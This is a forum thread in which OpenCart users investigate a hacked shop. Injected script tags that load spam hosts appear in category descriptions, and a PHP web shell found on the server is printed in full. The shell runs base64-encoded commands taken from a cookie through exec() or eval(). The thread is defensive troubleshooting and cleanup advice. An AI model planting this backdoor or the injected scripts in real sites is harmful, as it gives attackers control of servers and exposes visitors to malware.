Post by countzer0 » Wed Mar 29, 2017 8:19 pm

I have a client running a simple OC 2.2.0.0 installation which has been hacked. The hackers inserted links of the form:

Code: Select all

<script data-cfasync=\'false\' type=\'text/javascript\' src=\'//spam.delivery.domain1.com/blah.php\'></script><script type=\"text/javascript\" src=\"//spam.delivery.domain2.com/blah.php\"></script><script async=\"async\" type=\"text/javascript\" src=\"//spam.delivery.domain3.com/blah.php\"></script>
into the description field of all the product categories. The scripts hijack all clicks to open dodgy popups full of malware etc.
The filesystem is intact as far as I can tell (I have compared with a clean install). When I stripped out the spam from the database, it was reinjected within hours.
I found the following suspicious requests in the logs (one for each category URL):

Code: Select all

www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_74&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 6083 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_97&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5621 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
www.anonymised.co.uk 125.77.52.61 - - [28/Mar/2017:05:29:18 +0000] "GET /index.php?route=product/category&path=15_155&v=2&at1=63128313C28C29229C313E313E3126312631303132312643312&at2=11471&at3=0DA65DFB3754F2CCDCED84ED35AC66F1&at4=h4foVgXztaYg1zKOOLT7eGrf36xWfb1y HTTP/1.1" 200 5501 "-" "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 6.0) .NET CLR 2.0.50727)" 125.77.52.61
but I don't see how these could have been responsible.
Is OC 2.2.0.0 vulnerable to SQL injection? I thought db queries were filtered in OC? If so, how did they get in?

Thanks for any advice.

User avatar
New member

Posts

Joined
Sat Jun 18, 2011 11:09 pm
Location - Brighton, UK

Post by angela » Thu Mar 30, 2017 2:07 am


User avatar
New member

Posts

Joined
Fri Dec 02, 2016 2:14 am

Post by countzer0 » Thu Mar 30, 2017 3:59 pm

Thanks Angela. The exploit you linked to is a weakness in /system/helper/json.php. I compared the 2.2.0.0 and 2.3.0.2 versions of this file and they are identical. In other words, if this was the vulnerability, it's still present in the latest version... :(

A happy OpenCart developer from Brighton.


User avatar
New member

Posts

Joined
Sat Jun 18, 2011 11:09 pm
Location - Brighton, UK

Post by ADD Creative » Thu Mar 30, 2017 7:23 pm

The logs you posted look more like a command to an exploit than an exploit itself.

I would compare all the OpenCart files on your server to the originals. Also check any VQmods or OCmod that may modify catalog/controller/product/category.php or anything in system.

ADD Creative - Web development and e-commerce development, Milton Keynes or Christchurch, UK
ADD Filtration - HVAC Panel Filters, Bag Filters and HEPA Filters


Active Member

Posts

Joined
Sat Jan 14, 2012 1:02 am

Post by angela » Thu Mar 30, 2017 10:46 pm

countzer0 wrote:
Thu Mar 30, 2017 3:59 pm
Thanks Angela. The exploit you linked to is a weakness in /system/helper/json.php. I compared the 2.2.0.0 and 2.3.0.2 versions of this file and they are identical. In other words, if this was the vulnerability, it's still present in the latest version... :(
Exploit only works if PHP JSON extension is not installed.
Is PHP compiled with the JSON extension?

Other CVE's that may be worth checking (though mostly 1.x): http://www.cvedetails.com/vulnerability ... ncart.html

Others (is your client using Joomla?): http://www.exploitalert.com/search-resu ... h=OpenCart
and: https://github.com/opencart/opencart/issues/5151 (I tested this one on my installs, could not get it to work; may be dependent on server settings whether or not its successful)

There was also one (can't find it right now) where you can edit system settings and change error.log to error.php -> upload a shell script -- BUT you need the admin logins to pull this off. So have them change their admin logins and lock /admin down by restricting to their IP or, if they don't use the backup module, remove it completely. And if their admin is named /admin, change it to something less obvious. You may need to update any vqmod or extensions that rely on /admin existing to the new path.

User avatar
New member

Posts

Joined
Fri Dec 02, 2016 2:14 am

Post by countzer0 » Fri Mar 31, 2017 12:06 am

OK, I've just found something - a load of files in the /system/storage/download folder. They've all got names like:
route.php.jpg.e849b652eead396d7c1b6ad5bfa0408a
with old dates, so I thought they were just left over from old downloads. But the content of one of them is:

Code: Select all

<?php
	echo "$#@&\n\n";

	if(isset($_COOKIE['76027405']) && !empty($_COOKIE['76027405'])) {
		echo htmlentities((string) base64_decode($_COOKIE['76027405']),ENT_QUOTES);
		echo "<pre>";
		$outbuf="";$outstr="";exec(base64_decode($_COOKIE['76027405']),$outbuf);foreach($outbuf as $val) $outstr.=$val."\r\n";echo htmlentities($outstr);
	} elseif(isset($_COOKIE['26312595']) && !empty($_COOKIE['26312595'])) {
		echo htmlentities((string) base64_decode($_COOKIE['26312595']),ENT_QUOTES);
		echo "<pre>"; 
		eval((string) base64_decode($_COOKIE['26312595']));
	} elseif(isset($_COOKIE['13037085'])) {
		phpinfo();
	}

?>
which looks like it will run code which is base64 encoded in a cookie...

A happy OpenCart developer from Brighton.


User avatar
New member

Posts

Joined
Sat Jun 18, 2011 11:09 pm
Location - Brighton, UK

Post by ADD Creative » Fri Mar 31, 2017 10:26 pm

That is an attempt to use an issue in old 1.5.x versions on OpenCart. The issue was that the uploaded file name was encrypted and sent to the uploader. The file name could then be decrypted and then they would then attempt to execute the uploaded file.

This will not be the issue if you are using version 2.x or your server .htaccess is correctly configured.

Did you find any other changes to the files on your server?

Did you check that the JSON in installed (json support - enabled in phpinfo())?

ADD Creative - Web development and e-commerce development, Milton Keynes or Christchurch, UK
ADD Filtration - HVAC Panel Filters, Bag Filters and HEPA Filters


Active Member

Posts

Joined
Sat Jan 14, 2012 1:02 am

Post by countzer0 » Fri Mar 31, 2017 11:38 pm

OK thanks, it must be left over from the previous 1.5.x installation.

JSON support is enabled on the server. I can't find any other modified files.

I've changed all the passwords, cleaned the injected code out of the database, and put a function in my .tpl files to strip out any <script> tags. This was a few days ago. So far, so good...

A happy OpenCart developer from Brighton.


User avatar
New member

Posts

Joined
Sat Jun 18, 2011 11:09 pm
Location - Brighton, UK

Post by angela » Sat Apr 01, 2017 1:16 am

countzer0 wrote:
Fri Mar 31, 2017 11:38 pm
OK thanks, it must be left over from the previous 1.5.x installation.
How long ago did they upgrade from 1.5 to 2.2? It's certainly plausible their site was hacked with an exploit from 1.5 and upgraded with the hack still in effect.

What were the last modified timestamps of the hack files? The hacker could have certainly changed them, but may give you insight; assuming they were sloppy. Though, if the site had switched hosts after the hack and moved the files, they would have the date of first activity on the new hosts, unless modified/added at a later date.

User avatar
New member

Posts

Joined
Fri Dec 02, 2016 2:14 am

Post by rhysjuk » Fri Apr 07, 2017 6:47 am

Unfortunately I also have a client who was hacked by these low lifes. I had to rebuild the site and restore everything minus the product descriptions which held the dodgy pop up scripts. I managed to lock down most of the files including Json.php to 444 so they couldn't write to it, so far so good. The second time I rebuilt the site it was injected within a few hours, exactly as described above. Fingers crossed I've fixed it once and for all!

Newbie

Posts

Joined
Wed Mar 22, 2017 4:13 am
Who is online

Users browsing this forum: No registered users and 6 guests